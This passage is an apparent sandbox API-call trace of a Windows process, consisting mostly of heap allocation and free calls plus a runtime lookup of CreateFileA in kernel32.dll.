dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.920] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0171.920] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.920] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0171.920] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.921] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0171.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0171.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0171.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0171.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba120 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0171.921] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0171.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0171.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0171.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0171.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0171.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0171.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0171.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0171.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0171.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0171.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0171.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0171.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0171.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0171.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0171.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0171.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0171.925] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0171.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0171.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0171.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0171.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0171.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.928] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0171.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0171.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd8b8 [0171.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd8b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0171.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.929] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0171.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0171.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0171.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0171.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0171.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0171.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0171.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0171.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0171.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd8b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0171.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0171.929] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0171.929] HeapFree (in: hHeap=0x8a0000, 